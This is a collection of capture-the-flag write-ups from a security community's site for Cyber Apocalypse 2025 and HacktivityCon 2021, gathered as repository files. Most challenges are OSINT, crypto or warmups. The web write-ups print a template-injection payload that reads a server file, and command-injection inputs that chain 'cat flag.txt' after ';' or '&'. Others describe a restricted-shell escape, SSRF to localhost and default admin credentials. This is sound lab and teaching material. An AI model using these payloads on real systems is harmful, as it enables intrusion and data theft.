4 | desc: Check out our writeup for Dragon Fury for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: coding
9 | challenge: Dragon Fury
10 | tags: "coding, twh, python"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
20 | - Simulate the battle by computing the total damage dealt over successive rounds until victory is achieved
21 |
22 | ```
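import itertools
import json


def find_choices(sublists, target):
    """Pick one value from every sublist so that the picks sum to ``target``.

    Args:
        sublists: list of lists of numbers, one pick is taken from each.
        target: the sum the picks must reach.

    Returns:
        A list with one value per sublist (in sublist order) whose sum is
        ``target``, or ``None`` when no such combination exists.
    """
    # Walk every combination once instead of drawing random ones until a
    # match appears: the search is deterministic and ends even when the
    # target cannot be reached.
    for combo in itertools.product(*sublists):
        if sum(combo) == target:
            return list(combo)
    return None


if __name__ == "__main__":
    # First input line: JSON list of lists; second line: the target sum.
    input_text = json.loads(input())
    T = int(input())
    print(find_choices(input_text, T))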
46 | ```
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2025
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | ---
8 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/EchoesInStone.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Echoes In Stone Writeup
4 | desc: Check out our writeup for Echoes In Stone for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: Echoes In Stone
10 | tags: "osint, xan0er, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by Xan0er
18 |
19 |
20 | 
21 |
22 |
23 |
24 | - After a simple google reverse image search, we get the name of the place where this cross is located: `Muiredach's High Cross`
25 | - Coordinates: `53.7776973,-6.4178868`
26 |
27 | ```
28 | HTB{Muriedach_High_Cross}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheAncientCitadel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Ancient Citadel Writeup
4 | desc: Check out our writeup for The Ancient Citadel for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Ancient Citadel
10 | tags: "osint, twh, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
20 | 
21 |
22 | - Reverse image search reveals the name of the place : `castillo brunet`
23 | - Located at : `Iberia 104, 2571409 Viña del Mar, Valparaíso, Chile`
24 |
25 | ```
26 | HTB{Iberia_104_2571409_Viña_del_Mar_Valparaíso}
27 | ```
28 |
29 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheMechanicalBirdsNest.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Mechanical Bird's Nest Writeup
4 | desc: Check out our writeup for The Mechanical Bird's Nest for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Mechanical Bird's Nest
10 | tags: "osint, twh, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by thewhiteh4t
17 |
18 |
19 | 
20 |
21 | - For those who are into UAPs and aliens they know what this place is : Area51
22 | - Otherwise a reverse image search is enough
23 |
24 | https://maps.app.goo.gl/fKMxT9BCjm3qTuNB7
25 |
26 | HTB{37.247_-115.812}
27 |
28 |
29 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheShadowedSigil.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Shadowed Sigil Writeup
4 | desc: Check out our writeup for The Shadowed Sigil for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Shadowed Sigil
10 | tags: "osint, twh, search"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
20 | - An IP address is given, which is an IoC of APT28 : `139.5.177.205`
21 |
22 | https://ioc.one/auth/attribute/edaac7f0-e137-5bdf-a2d3-5377b688275e
23 |
24 |
25 | HTB{APT28}
26 |
27 |
28 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheStoneThatWhispers.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Stone That Whispers Writeup
4 | desc: Check out our writeup for The Stone That Whispers for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Stone That Whispers
10 | tags: "osint, xan0er, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by Xan0er
18 |
19 |
20 | 
21 |
22 | - Just like the `Echoes In Stone` challenge, we ran a reverse image search on the image given in the challenge and got the name of the place where this stone is located: `Hill Of Tara`
23 | - After reading through the Wikipedia article, we get the name of the stone: `Lia Fail`
24 | - Coordinates: `53.5817331,-6.6101392`
25 |
26 | ```
27 | HTB{Lia_Fail}
28 | ```
29 |
30 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/web.md:
--------------------------------------------------------------------------------
1 | # web
2 |
3 | ## Trial by Fire
4 | > Solved by thewhiteh4t
5 |
6 |
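7 | - We have an input field and a hint pointing at SSTI (server-side template injection): `Can you read the runes? Perhaps 49 is the key.` 49 is what the usual `7*7` template probe renders to when the server evaluates user input as a template
8 | - On the battle result page we can see that SSTI is working, i.e. our input is evaluated by the template engine instead of being printed back as plain text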
9 |
10 |
11 | 
12 |
13 | - Payload :
14 |
15 | ```
16 | {{ request.__class__._load_form_data.__globals__.__builtins__.open("/app/flag.txt").read() }}
17 | ```
18 |
19 | - The length of the input is restricted only in the front-end, which is a client-side limit and not a server-side check, so we can either edit the length in the browser inspector or simply send the request with Burp
20 |
21 |
22 | 
23 |
24 | ----------
25 |
26 |
27 | ## Whispers of the Moonbeam
28 | > Solved by thewhiteh4t
29 |
30 |
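31 | - The page itself hints very clearly at command injection
32 | - Payload (the `;` ends the `gossip` command, so what follows runs as a second command, which suggests the input reaches a shell unsanitised) :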
33 |
34 | ```
35 | gossip; cat flag.txt
36 | ```
37 |
38 | 
39 |
40 |
41 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/web/TrialbyFire.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Trial by Fire Writeup
4 | desc: Check out our writeup for Trial by Fire for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: web
9 | challenge: Trial by Fire
10 | tags: "web, twh, ssti"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by thewhiteh4t
17 |
18 |
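19 | - We have an input field and a hint pointing at SSTI (server-side template injection): `Can you read the runes? Perhaps 49 is the key.` 49 is what the usual `7*7` template probe renders to when the server evaluates user input as a template
20 | - On the battle result page we can see that SSTI is working, i.e. our input is evaluated by the template engine instead of being printed back as plain text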
21 |
22 |
23 | 
24 |
25 | - Payload :
26 |
27 | ```
28 | {% raw %}
29 | {{ request.__class__._load_form_data.__globals__.__builtins__.open("/app/flag.txt").read() }}
30 | {% endraw %}
31 | ```
32 |
33 | - The length of the input is restricted only in the front-end, which is a client-side limit and not a server-side check, so we can either edit the length in the browser inspector or simply send the request with Burp
34 |
35 |
36 | 
37 |
38 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/web/WhispersoftheMoonbeam.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Whispers of the Moonbeam Writeup
4 | desc: Check out our writeup for Whispers of the Moonbeam for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: web
9 | challenge: Whispers of the Moonbeam
10 | tags: "web, twh, command, injection"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
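20 | - The page itself hints very clearly at command injection
21 | - Payload (the `;` ends the `gossip` command, so what follows runs as a second command, which suggests the input reaches a shell unsanitised) :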
22 |
23 | ```
24 | gossip; cat flag.txt
25 | ```
26 |
27 | 
28 |
29 |
30 |
--------------------------------------------------------------------------------
/gpnctf_2024/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | GPN CTF 2024
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Gpnctf 2024
7 | ---
--------------------------------------------------------------------------------
/hacktivitycon_2021/README.md:
--------------------------------------------------------------------------------
1 | # HacktivityCon CTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Crypto](crypto.md)
8 | * [Misc](misc.md)
9 | * [Mobile](mobile.md)
10 | * [OSINT](osint.md)
11 | * [Pwn](pwn.md)
12 | * [Scripting](scripting.md)
13 | * [Warmups](warmups.md)
14 | * [Web](web.md)
--------------------------------------------------------------------------------
/hacktivitycon_2021/crypto/Hexahedron.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Hexahedron Writeup
4 | desc: Check out our writeup for Hexahedron for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: crypto
9 | challenge: Hexahedron
10 | tags: "crypto, taz, rsa, rsactftool"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 |
19 | - We are given the values of n, e and c.
20 | - Decode them into plain integers using Python.
21 | 
22 |
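23 | - It looks like RSA (modulus n, public exponent e, ciphertext c), so we used RsaCtfTool to decipher it. Note that e is 3 and c is noticeably shorter than n, so the cubed message probably never wrapped around the modulus. That is the unpadded small-exponent case such tools can recover without the private key.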
24 |
25 | : https://github.com/Ganapati/RsaCtfTool
26 |
27 |
28 | python3 RsaCtfTool.py -n 112339816301925396926211289689793745814213925314273886071305785874178028552510482239036537066616690493241410015435402110525284201411608164205573122430898583517515498250410244592963132324072861567753086739636553410154316180827724708002409356129254383468446158145079982391991062389788544378839486986385137994309 -e 3 --uncipher 2217344750798178599616518881851238192046537371134831984828894413752520937378161486880269974456574131502921272953104454680926482208357166098075344508240480152890914678813031666242202555794691235412837030045499161787224264164243336308650477343133919653356349913604131486721125
29 |
30 |
31 | 
32 |
33 |
34 | here we have the flag.
--------------------------------------------------------------------------------
/hacktivitycon_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | HacktivityCon 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | ---
--------------------------------------------------------------------------------
/hacktivitycon_2021/misc/BadWords.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Bad Words Writeup
4 | desc: Check out our writeup for Bad Words for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: misc
9 | challenge: Bad Words
10 | tags: "misc, bobby, bash, jail, escape"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : bobbysox
19 |
20 | This challenge was interesting. 99% of characters that I entered were flagged as “Bad Words”.
21 | After some trial and error, I got the first message shown below: “bash: fg: no job control”
22 |
23 | I tried to implement some job control with no luck. However, while trying this, I noticed it processed “#! /bin/bash” without throwing errors. It processes the “/” character!!!! This made me take a step back and think about what we’re in: a custom restricted shell. In the past I’ve usually used native binaries to escape such situations. We have two options here: prefix our commands with “/”, or try to call native binaries by their full path, since we know any path gets past the filter. The latter seemed like the best solution. Call /bin/bash and see what happens. It worked!!! yay!
24 |
25 |
26 | 
27 |
28 |
29 |
30 | 
31 |
32 |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/mobile.md:
--------------------------------------------------------------------------------
1 | # mobile
2 |
3 | ## To do
4 | > Solved by: Starry-lord
5 |
6 | De-compile the app
7 |
8 | I personally used
9 | https://www.decompiler.com/jar/62e31f7faaf148b1b1c4fd143e5480c1/todo.apk/sources/com/congon4tor/todo/LoginActivity.java
10 |
11 |
12 | 
13 |
14 |
15 | Find the hard-coded password "testtest" in the decompiled `LoginActivity.java`
16 |
17 | Login to the app and find to do list along with the flag
18 |
19 |
20 | 
21 |
22 | ----------
23 |
24 | ## Reactor
25 | > Solved by: Starry-Lord
26 |
27 |
28 | The flag gets more and more unscrambled as each correct digit is entered.
29 | Basically, because the app de-obfuscates the flag dynamically, each digit of the 4-digit PIN can be checked on its own: the output tells you whether your first characters are correct, like an eval-style oracle. That brings the total number of possibilities down to less than 40 instead of every 4-digit combination.
30 |
31 | A. Input 1 digit, 0 to 5, (5)
32 | B. Input second digit 0-9(9)
33 | C. Input third digit 0-2(2)
34 | D. Input fourth digit 0-7(flag!)
35 |
36 | 27 tries in total, out of a maximum of 40
37 |
38 | I agree it's most likely not the intended way but 4 digits pin plus Eval like function is vulnerable enough 😉
39 |
40 | 
41 |
42 |
43 | 5 was the only one starting with letter f, four characters and a promising { like in other flags.
44 |
45 | 
46 |
47 | 
48 |
49 | 
50 |
51 | 
52 |
53 |
54 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/mobile/Reactor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Reactor Writeup
4 | desc: Check out our writeup for Reactor for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: mobile
9 | challenge: Reactor
10 | tags: "mobile, starry"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 |
19 | The flag gets more and more unscrambled as each correct digit is entered.
20 | Basically, because the app de-obfuscates the flag dynamically, each digit of the 4-digit PIN can be checked on its own: the output tells you whether your first characters are correct, like an eval-style oracle. That brings the total number of possibilities down to less than 40 instead of every 4-digit combination.
21 |
22 | A. Input 1 digit, 0 to 5, (5)
23 | B. Input second digit 0-9(9)
24 | C. Input third digit 0-2(2)
25 | D. Input fourth digit 0-7(flag!)
26 |
27 | 27 tries in total, out of a maximum of 40
28 |
29 | I agree it's most likely not the intended way but 4 digits pin plus Eval like function is vulnerable enough 😉
30 |
31 | 
32 |
33 |
34 | 5 was the only one starting with letter f, four characters and a promising { like in other flags.
35 |
36 | 
37 |
38 | 
39 |
40 | 
41 |
42 | 
43 |
44 |
45 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/mobile/Todo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | To do Writeup
4 | desc: Check out our writeup for To do for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: mobile
9 | challenge: To do
10 | tags: "mobile, starry"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-lord
17 |
18 | De-compile the app
19 |
20 | I personally used
21 | https://www.decompiler.com/jar/62e31f7faaf148b1b1c4fd143e5480c1/todo.apk/sources/com/congon4tor/todo/LoginActivity.java
22 |
23 |
24 | 
25 |
26 |
27 | Find the hard-coded password "testtest" in the decompiled `LoginActivity.java`
28 |
29 | Login to the app and find to do list along with the flag
30 |
31 |
32 | 
--------------------------------------------------------------------------------
/hacktivitycon_2021/osint.md:
--------------------------------------------------------------------------------
1 | # osint
2 |
3 | ## Challenge Jed Sheeran
4 | > Solved by: Starry-lord
5 |
6 | Google jed sheeran music and find a soundcloud account
7 |
8 |
9 | https://m.soundcloud.com/user-836083929-176777888/beautiful-people
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/osint/ChallengeJedSheeran.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Challenge Jed Sheeran Writeup
4 | desc: Check out our writeup for Challenge Jed Sheeran for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: osint
9 | challenge: Challenge Jed Sheeran
10 | tags: "osint, starry"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-lord
17 |
18 | Google jed sheeran music and find a soundcloud account
19 |
20 |
21 | https://m.soundcloud.com/user-836083929-176777888/beautiful-people
22 |
23 | 
24 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## Butter Overflow
4 | > Solved by: Taz34
5 |
6 |
7 | - As the name suggested it’s a buffer overflow challenge
8 | - So I started by giving huge inputs
9 | - And further narrowed it down and found the offset
10 | - The offset is 520 so we need 521 characters to do a buffer overflow to read the flag
11 | 
12 |
13 |
14 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/pwn/ButterOverflow.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Butter Overflow Writeup
4 | desc: Check out our writeup for Butter Overflow for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: pwn
9 | challenge: Butter Overflow
10 | tags: "pwn, taz, bof"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 |
19 | - As the name suggested it’s a buffer overflow challenge
20 | - So I started by giving huge inputs
21 | - And further narrowed it down and found the offset
22 | - The offset is 520 so we need 521 characters to do a buffer overflow to read the flag
23 | 
24 |
25 |
26 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/2EZ.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | 2EZ Writeup
4 | desc: Check out our writeup for 2EZ for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: 2EZ
10 | tags: "warmup, twh, magic bytes"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 |
21 | - We are given a file named `2ez`
22 | - the file format is not known when I tested it with `file` command
23 |
24 |
25 | 
26 |
27 | - next I tried `binwalk` to look for any hidden files but the output was blank
28 | - next I checked the magic bytes of the file, i.e. the first bytes of its header
29 | - the magic bytes are what identifies the file format
30 | - the `file` command checks the magic and the file footer to determine the correct file type
31 |
32 |
33 | 
34 |
35 |
36 |
37 | - JFIF header means a jpeg file
38 | - correct header for JFIF in hex is : `FF D8 FF`
39 | - but the file given to us starts with different bytes, so I fixed the header using a hex editor
40 |
41 |
42 | 
43 |
44 | - Saved it as a new file and solved
45 |
46 |
47 | 
48 |
49 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/Bass64.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Bass64 Writeup
4 | desc: Check out our writeup for Bass64 for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Bass64
10 | tags: "warmup, twh"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 |
21 | - We are given a text file in this challenge
22 | - file contains letters and numbers in ASCII art
23 | - it’s actually a base64 string
24 | - converting it gives the flag
25 |
26 |
27 | 
28 |
29 |
30 |
31 | flag{35a5d13da6a2afa0c62bfcbdd6301a0a}
32 |
33 |
34 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/Pimple.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Pimple Writeup
4 | desc: Check out our writeup for Pimple for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Pimple
10 | tags: "warmup, twh, gimp"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 |
21 | - We are given a gimp project file in this challenge
22 | - there are multiple layers
23 | - each layer contains an image
24 | - to see the flag I started hiding the layers one by one from top and eventually saw the flag
25 |
26 |
27 | 
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/SixFourOverTwo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Six Four Over Two Writeup
4 | desc: Check out our writeup for Six Four Over Two for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Six Four Over Two
10 | tags: "warmup, taz"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved by: Taz34
19 |
20 | We are given a cipher text; run it through CyberChef and decode it to get the flag.
21 |
22 | 
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/TSUNAMI.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | TSUNAMI Writeup
4 | desc: Check out our writeup for TSUNAMI for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: TSUNAMI
10 | tags: "warmup, taz, stegano, sonic, spectogram"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved by: Taz34
19 |
20 |
21 | - We are given a .wav audio file
22 | - at the end of the audio we can hear some disturbances
23 | - so I checked the audio file with Sonic Visualiser
24 | - and looked at it with spectrograms
25 | 
26 |
27 |
28 | here is the flag.
29 |
30 |
31 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/TargetPractice.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Target Practice Writeup
4 | desc: Check out our writeup for Target Practice for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Target Practice
10 | tags: "warmup, ava, stegano"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : ava
17 |
18 | We are given a GIF file, which actually plays, and after opening it we can see that it shows some sort of code which changes pretty quickly, so we need to split the GIF into frames. I used https://ezgif.com/split to split it, downloaded all the frames, and did a quick Google reverse image search on one of them, which told us that the code is called MAXICODE, used by UPS.
19 | Then I found a MAXICODE decoder - https://products.aspose.app/barcode/recognize/maxicode#
20 | and I had to manually check every image, which does not seem like the intended way, but okie.
21 | The 15th frame (if you started counting from 0) has the flag
22 |
23 | `flag{385e3ae5d7b2ca2510be8ef4}`
24 |
25 |
26 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/web/Confidentiality.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Confidentiality Writeup
4 | desc: Check out our writeup for Confidentiality for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: web
9 | challenge: Confidentiality
10 | tags: "web, taz"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Taz34
18 |
19 |
20 | - here we have a service which lists all the items in the mentioned dir
21 | - so i simply started looking for flag, look for elements in the /home dir
22 | - here we have a user dir and in that we have the flag.txt
23 | 
24 |
25 |
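26 | now to read the file we append a second command after `&`; the directory name seems to be passed to a shell command unsanitised, so the `cat` runs as well: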
27 |
28 | /home/user & cat /home/user/flag.txt
29 | 
30 |
31 |
32 | here we have the flag
--------------------------------------------------------------------------------
/hacktivitycon_2021/web/SWAGGY.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | SWAGGY Writeup
4 | desc: Check out our writeup for SWAGGY for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: web
9 | challenge: SWAGGY
10 | tags: "web, taz"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 |
19 | - Change the server to the testing server
20 | 
21 |
22 | - now authorize using the admin:admin credentials
23 | 
24 |
25 | - now try and execute the request to get the flag
26 | 
27 |
28 |
29 | here we have the flag.
30 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/web/Titanic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Titanic Writeup
4 | desc: Check out our writeup for Titanic for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: web
9 | challenge: Titanic
10 | tags: "web, twh"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 |
19 | - In this challenge we were given a website of a company
20 | - Two things which instantly caught attention were `URL Capture` and `Admin` buttons
21 | - URL capture service accepts a URL and takes screenshot of the webpage
22 |
23 |
24 | 
25 |
26 |
27 |
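28 | - The Admin page has a login form
29 | - First idea was to give the URL capture service `http://localhost`, and it worked: the page is fetched from the server side, so the service can reach content that is only served locally (SSRF)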
30 |
31 |
32 | 
33 |
34 | 
35 |
36 | - This is same as the loading splash screen I saw while loading the challenge website
37 | - Next I checked `robots.txt` and got 200 and this revealed a new path `/server-status`
38 |
39 |
40 | 
41 |
42 |
43 |
44 | - Next I obviously tried to access `/server-status` and got 200 again
45 |
46 |
47 | 
48 |
